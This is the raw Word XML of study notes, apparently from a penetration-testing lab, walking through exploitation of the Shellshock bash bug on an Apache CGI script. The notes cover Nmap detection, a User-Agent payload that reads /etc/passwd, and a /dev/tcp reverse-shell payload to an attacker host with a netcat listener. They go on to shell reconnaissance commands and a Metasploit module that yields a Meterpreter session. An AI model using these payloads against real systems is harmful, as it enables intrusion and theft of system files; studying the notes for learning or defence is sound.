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ECDE" w14:textId="4A10B07F" w:rsidR="00853ABF" w:rsidRDefault="00460ABD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746720">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2116B668" w14:textId="3362BE40" w:rsidR="004973BE" w:rsidRDefault="004973BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00706BD8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apache, bash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121D3F94" w14:textId="094405FF" w:rsidR="00746720" w:rsidRPr="00746720" w:rsidRDefault="00746720">
      <w:r>
        <w:t>Execute command after a series of character.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D758B8" w14:textId="0C949003" w:rsidR="00460ABD" w:rsidRDefault="00746720">
      <w:r>
        <w:t>Get shell on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0BA28A" w14:textId="2079D949" w:rsidR="00746720" w:rsidRDefault="00746720">
      <w:r>
        <w:t>Remotely execute the command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C1136E" w14:textId="6E29609C" w:rsidR="00746720" w:rsidRPr="00706BD8" w:rsidRDefault="00746720">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC367CB" w14:textId="77777777" w:rsidR="00746720" w:rsidRDefault="00746720"/>
    <w:p w14:paraId="61238E9D" w14:textId="7FCADC99" w:rsidR="00746720" w:rsidRDefault="00746720">
      <w:r>
        <w:t xml:space="preserve">Bash is nix shell </w:t>
      </w:r>
      <w:r w:rsidR="007801FA">
        <w:t>part</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of GNU project (default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1632BF1A" w14:textId="0D747C15" w:rsidR="00746720" w:rsidRDefault="00746720">
      <w:r>
        <w:t>Nix = Unix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F23C1CE" w14:textId="77777777" w:rsidR="00746720" w:rsidRDefault="00746720"/>
    <w:p w14:paraId="79BEE248" w14:textId="145E37DA" w:rsidR="00706BD8" w:rsidRDefault="00706BD8">
      <w:r>
        <w:t xml:space="preserve">CGI scripts and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scripts are also </w:t>
      </w:r>
      <w:r w:rsidR="004973BE">
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50209C3A" w14:textId="77777777" w:rsidR="00706BD8" w:rsidRDefault="00706BD8"/>
    <w:p w14:paraId="4E15770A" w14:textId="3DEE5C56" w:rsidR="004973BE" w:rsidRDefault="004973BE">
      <w:r>
        <w:t>CGI = common gateway interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025EE9C1" w14:textId="77777777" w:rsidR="004973BE" w:rsidRDefault="004973BE"/>
    <w:p w14:paraId="7C785D96" w14:textId="247DD6A4" w:rsidR="004973BE" w:rsidRPr="007801FA" w:rsidRDefault="004973BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004973BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affective is to inject the perimeter in the user agent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> http header</w:t>
      </w:r>
      <w:r w:rsidRPr="004973BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1030D1F4" w14:textId="77777777" w:rsidR="004973BE" w:rsidRDefault="004973BE"/>
    <w:p w14:paraId="7DB2A66B" w14:textId="77777777" w:rsidR="004973BE" w:rsidRDefault="004973BE"/>
    <w:p w14:paraId="08D41BFA" w14:textId="1B378DA0" w:rsidR="00706BD8" w:rsidRDefault="004973BE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D40F13E" wp14:editId="43587934">
            <wp:extent cx="5959314" cy="682283"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="80171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9236" name="Picture 8017192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050" cy="6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CBB9" w14:textId="77777777" w:rsidR="00706BD8" w:rsidRDefault="00706BD8"/>
    <w:p w14:paraId="118E8100" w14:textId="77777777" w:rsidR="00746720" w:rsidRDefault="00746720"/>
    <w:p w14:paraId="6CCDBF9D" w14:textId="6ADC0C75" w:rsidR="008B03B0" w:rsidRPr="008B03B0" w:rsidRDefault="008B03B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B03B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09105E36" w14:textId="3A7808DB" w:rsidR="004973BE" w:rsidRPr="004973BE" w:rsidRDefault="004973BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004973BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manually:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364AB8D5" w14:textId="77777777" w:rsidR="00F173C2" w:rsidRDefault="00F173C2"/>
    <w:p w14:paraId="2038E5FC" w14:textId="2763AF59" w:rsidR="008B03B0" w:rsidRDefault="008B03B0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C6FED70" w14:textId="59842E59" w:rsidR="004973BE" w:rsidRDefault="008B03B0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000602F3">
        <w:t>Namp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000602F3">
        <w:t xml:space="preserve"> -s V  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000602F3">
        <w:t>target_ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="088EAAFC" w14:textId="77777777" w:rsidR="000602F3" w:rsidRDefault="000602F3"/>
    <w:p w14:paraId="5E38CE54" w14:textId="5E954E20" w:rsidR="000602F3" w:rsidRDefault="000602F3">
      <w:r>
        <w:t># target run the http server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F48D0BB" w14:textId="48F1DD1F" w:rsidR="000602F3" w:rsidRDefault="000602F3">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="00782BF3">
        <w:t>timer show</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the we</w:t>
      </w:r>
      <w:r w:rsidR="00782BF3">
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">site is due to the use of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
      <w:r w:rsidR="00782BF3">
        <w:t xml:space="preserve"> by looking at the source code</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB385A" w14:textId="77777777" w:rsidR="00782BF3" w:rsidRDefault="00782BF3"/>
    <w:p w14:paraId="43A2D01E" w14:textId="533BE972" w:rsidR="00782BF3" w:rsidRPr="00782BF3" w:rsidRDefault="00782BF3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Check that the web server is vuln to shellshock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B08AE" w14:textId="77777777" w:rsidR="00782BF3" w:rsidRDefault="00782BF3"/>
    <w:p w14:paraId="3FC67974" w14:textId="6C1A6E59" w:rsidR="000602F3" w:rsidRDefault="00782BF3">
      <w:r>
        <w:t xml:space="preserve">Nmap -s V  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  --script=http-shellshock  </w:t>
      </w:r>
      <w:r w:rsidR="009E0D80">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>script-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “http</w:t>
      </w:r>
      <w:r w:rsidR="009E0D80">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellshock</w:t>
      </w:r>
      <w:r w:rsidR="009E0D80">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> =/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gettime.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E0D80">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5033CC74" w14:textId="77777777" w:rsidR="00962441" w:rsidRDefault="00962441"/>
    <w:p w14:paraId="1BB858D8" w14:textId="58A86B93" w:rsidR="00782BF3" w:rsidRDefault="00962441">
      <w:r w:rsidRPr="00962441">
        <w:t xml:space="preserve">/page → </w:t>
      </w:r>
      <w:r w:rsidRPr="00962441">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URI (path to the resource on the server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046652BD" w14:textId="77777777" w:rsidR="007C58EB" w:rsidRDefault="007C58EB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EACE0B6" w14:textId="65DDADED" w:rsidR="009E0D80" w:rsidRPr="009E0D80" w:rsidRDefault="009E0D80">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E0D80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E0D80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E0D80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2188D8" w14:textId="77777777" w:rsidR="009E0D80" w:rsidRDefault="009E0D80"/>
    <w:p w14:paraId="140D0FCE" w14:textId="0DDBAA9F" w:rsidR="008516EB" w:rsidRDefault="008516EB">
      <w:r>
        <w:t xml:space="preserve">Intercept the request and by moving on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gettime.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48E6693E" w14:textId="52C5032A" w:rsidR="008516EB" w:rsidRDefault="008516EB">
      <w:r>
        <w:t>Send to repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749A6610" w14:textId="17B27592" w:rsidR="008516EB" w:rsidRDefault="008516EB">
      <w:r>
        <w:t xml:space="preserve">Change </w:t>
      </w:r>
      <w:r w:rsidRPr="008516EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FEA56A" w14:textId="4CF5B0C8" w:rsidR="008516EB" w:rsidRDefault="001B2CEA">
      <w:r>
        <w:t xml:space="preserve">User agent : () {  : ;}; echo ; echo; </w:t>
      </w:r>
      <w:r w:rsidR="00EC038F">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bin/bash  -c “cat </w:t>
      </w:r>
      <w:r w:rsidR="00EC038F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B649D8" w14:textId="088BB6A9" w:rsidR="001B2CEA" w:rsidRDefault="00EC038F">
      <w:r>
        <w:t>And then send the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E824181" w14:textId="72EB283D" w:rsidR="00782BF3" w:rsidRDefault="00782BF3"/>
    <w:p w14:paraId="6A6EC01E" w14:textId="0D916A82" w:rsidR="00EC038F" w:rsidRPr="00EC038F" w:rsidRDefault="00EC038F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC038F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>To get the reverse shell of target system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BBDF54" w14:textId="3A985580" w:rsidR="00EC038F" w:rsidRDefault="00EC038F">
      <w:r>
        <w:t>Set listener on the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B79DA9C" w14:textId="5450F127" w:rsidR="00EC038F" w:rsidRDefault="00EC038F">
      <w:r>
        <w:t>Nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E560385" w14:textId="77777777" w:rsidR="00EC038F" w:rsidRDefault="00EC038F"/>
    <w:p w14:paraId="492A657A" w14:textId="236D99A0" w:rsidR="00EC038F" w:rsidRPr="00EC038F" w:rsidRDefault="00EC038F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC038F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC038F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC038F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C96CF10" w14:textId="76CCD3DF" w:rsidR="00EC038F" w:rsidRDefault="00EC038F" w:rsidP="00EC038F">
      <w:r>
        <w:t>User agent : () {  : ;}; echo ; echo; /bin/bash  -c “</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF4914">
        <w:t>&gt;&amp;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF4914">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF4914">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF4914">
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF4914">
        <w:t>/port 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC33FA5" w14:textId="77777777" w:rsidR="00EC038F" w:rsidRDefault="00EC038F"/>
    <w:p w14:paraId="382136EA" w14:textId="77777777" w:rsidR="00D85D31" w:rsidRPr="00D85D31" w:rsidRDefault="00D85D31" w:rsidP="00D85D31">
      <w:r w:rsidRPr="00D85D31">
        <w:lastRenderedPageBreak/>
        <w:t>  User-Agent: — where the attacker hides the payload (an HTTP header).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D448E77" w14:textId="77777777" w:rsidR="00D85D31" w:rsidRPr="00D85D31" w:rsidRDefault="00D85D31" w:rsidP="00D85D31">
      <w:r w:rsidRPr="00D85D31">
        <w:t xml:space="preserve">  () { :; }; — looks like a function definition; on </w:t>
      </w:r>
      <w:r w:rsidRPr="00D85D31">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r w:rsidRPr="00D85D31">
        <w:t xml:space="preserve"> Bash it makes Bash run what comes next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A54CD" w14:textId="77777777" w:rsidR="00D85D31" w:rsidRPr="00D85D31" w:rsidRDefault="00D85D31" w:rsidP="00D85D31">
      <w:r w:rsidRPr="00D85D31">
        <w:t>  echo; echo; — harmless padding/separators used by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F343A20" w14:textId="77777777" w:rsidR="00D85D31" w:rsidRPr="00D85D31" w:rsidRDefault="00D85D31" w:rsidP="00D85D31">
      <w:r w:rsidRPr="00D85D31">
        <w:t>  /bin/bash -c "..." — asks Bash to run the command inside the quotes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A6CEFD" w14:textId="77777777" w:rsidR="00D85D31" w:rsidRPr="00D85D31" w:rsidRDefault="00D85D31" w:rsidP="00D85D31">
      <w:r w:rsidRPr="00D85D31">
        <w:t>  bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D85D31">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D85D31">
        <w:t xml:space="preserve"> — starts an interactive shell (so the attacker can type commands).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275FB94C" w14:textId="77777777" w:rsidR="00D85D31" w:rsidRPr="00D85D31" w:rsidRDefault="00D85D31" w:rsidP="00D85D31">
      <w:r w:rsidRPr="00D85D31">
        <w:t>  &gt;&amp;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D85D31">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D85D31">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D85D31">
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D85D31">
        <w:t>/port and 0&gt;&amp;1 — send the shell’s output to the attacker and take input from the same network connection (a reverse shell).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA5604C" w14:textId="4D66F071" w:rsidR="00FD68BE" w:rsidRDefault="003174E2">
      <w:r w:rsidRPr="00D85D31">
        <w:t xml:space="preserve">0&gt;&amp;1 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
      <w:r w:rsidR="0016697A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003174E2">
        <w:t>That wires input and output to the same connection so the remote side can both send commands (stdin) and receive output (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003174E2">
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003174E2">
        <w:t>/stderr).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EDA28A" w14:textId="77777777" w:rsidR="00361D76" w:rsidRDefault="00361D76" w:rsidP="00962441">
      <w:r w:rsidRPr="00361D76">
        <w:t xml:space="preserve">0 = stdin, 1 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00361D76">
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00361D76">
        <w:t>, 2 = stderr (standard Unix file descriptor numbers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CD5672" w14:textId="77777777" w:rsidR="00962441" w:rsidRDefault="00962441"/>
    <w:p w14:paraId="0F5F7A14" w14:textId="77777777" w:rsidR="00962441" w:rsidRDefault="00962441"/>
    <w:p w14:paraId="5222A9FA" w14:textId="1C0113CE" w:rsidR="000602F3" w:rsidRPr="00962441" w:rsidRDefault="00962441">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962441">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00962441">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>revershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00962441">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE2B5D" w14:textId="66A47802" w:rsidR="00962441" w:rsidRDefault="00962441">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="168FA42F" w14:textId="682F4D83" w:rsidR="00962441" w:rsidRDefault="00962441" w:rsidP="00962441">
      <w:r>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/*issue    # shows /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/issue or similar files (OS identification text)</w:t>
      </w:r>
      <w:r w:rsidR="00E623BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5AEDF1" w14:textId="1F9A54BA" w:rsidR="00962441" w:rsidRDefault="00962441" w:rsidP="00962441">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a           # full kernel + system info (kernel name, hostname, kernel version, arch, ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B97AB7" w14:textId="77777777" w:rsidR="00962441" w:rsidRDefault="00962441"/>
    <w:p w14:paraId="7C51157A" w14:textId="7CF14ACA" w:rsidR="008B03B0" w:rsidRPr="00A3269A" w:rsidRDefault="00A3269A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3269A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automatically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74AAFE" w14:textId="0CD1BC01" w:rsidR="00A3269A" w:rsidRDefault="00A3269A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02E861E5" w14:textId="06F03F71" w:rsidR="00A3269A" w:rsidRDefault="00A3269A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E06D2DA" w14:textId="338674B7" w:rsidR="00A3269A" w:rsidRDefault="00A3269A">
      <w:r>
        <w:t>Search shellshock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E66260" w14:textId="784B94B2" w:rsidR="00A3269A" w:rsidRDefault="00A3269A">
      <w:r>
        <w:t>Use(num/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apache_mod_cgi_bash_envnemt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>….)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C39185" w14:textId="769E84B2" w:rsidR="00A3269A" w:rsidRDefault="00A3269A">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0381C588" w14:textId="7A64616F" w:rsidR="00A3269A" w:rsidRDefault="00A3269A">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E4CD090" w14:textId="14AE3CB8" w:rsidR="00A3269A" w:rsidRDefault="00A3269A">
      <w:r>
        <w:t>Set TARGETURI /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gettime.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="175438A9" w14:textId="7FBBA984" w:rsidR="00A3269A" w:rsidRDefault="00A3269A">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21749E3F" w14:textId="77777777" w:rsidR="00A3269A" w:rsidRDefault="00A3269A"/>
    <w:p w14:paraId="3FFEF255" w14:textId="16256E99" w:rsidR="00A3269A" w:rsidRPr="00A3269A" w:rsidRDefault="00A3269A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3269A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A3269A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpeter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A3269A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B0F56E" w14:textId="77777777" w:rsidR="00A3269A" w:rsidRDefault="00A3269A"/>
    <w:p w14:paraId="1D6A584C" w14:textId="22CC9AF8" w:rsidR="00A3269A" w:rsidRDefault="00A3269A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7610C9D2" w14:textId="77777777" w:rsidR="00A3269A" w:rsidRDefault="00A3269A"/>
    <w:p w14:paraId="39A9C37C" w14:textId="77777777" w:rsidR="008B03B0" w:rsidRDefault="008B03B0"/>
    <w:sectPr w:rsidR="008B0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18"/>
    <w:rsid w:val="00003DE2"/>
    <w:rsid w:val="000602F3"/>
    <w:rsid w:val="000D2D29"/>
    <w:rsid w:val="0016697A"/>
    <w:rsid w:val="001B2CEA"/>
    <w:rsid w:val="003174E2"/>
    <w:rsid w:val="00361D76"/>
    <w:rsid w:val="00460ABD"/>
    <w:rsid w:val="004973BE"/>
    <w:rsid w:val="00540BB6"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00552F0F"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00706BD8"/>
    <w:rsid w:val="00746720"/>
    <w:rsid w:val="007801FA"/>
    <w:rsid w:val="00782BF3"/>
    <w:rsid w:val="007C58EB"/>
    <w:rsid w:val="008339B1"/>
    <w:rsid w:val="008516EB"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008B03B0"/>
